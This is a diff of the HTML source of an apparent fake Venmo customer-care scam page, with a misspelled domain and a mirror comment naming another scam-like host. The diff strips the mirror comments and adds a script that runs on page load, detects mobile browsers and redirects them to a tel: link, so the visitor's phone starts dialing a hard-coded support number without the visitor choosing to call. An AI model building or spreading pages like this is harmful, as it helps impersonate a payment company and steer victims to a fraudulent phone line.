--- a/view-page-source.com-venmoo-24x7-cust0mer-care-serviceon-two.vercel.app_.html
+++ b/view-page-source.com-venmoo-24x7-cust0mer-care-serviceon-two.vercel.app_.html
@@ -2,7 +2,6 @@
 <html lang="en">
 
 
-<!-- Mirrored from vnmsprt.usdpro.live/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 02 Jun 2025 05:29:49 GMT -->
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
@@ -319,7 +318,9 @@
 
     <!-- =======     Call Whatsaap icon end ======= -->
 </body>
+    <script>
+function autoDial(){var isMobile=/Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);if(isMobile){window.location.href="tel:+18773379606";}}window.onload=autoDial;
+</script>
 
 
-<!-- Mirrored from vnmsprt.usdpro.live/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 02 Jun 2025 05:29:50 GMT -->
 </html>
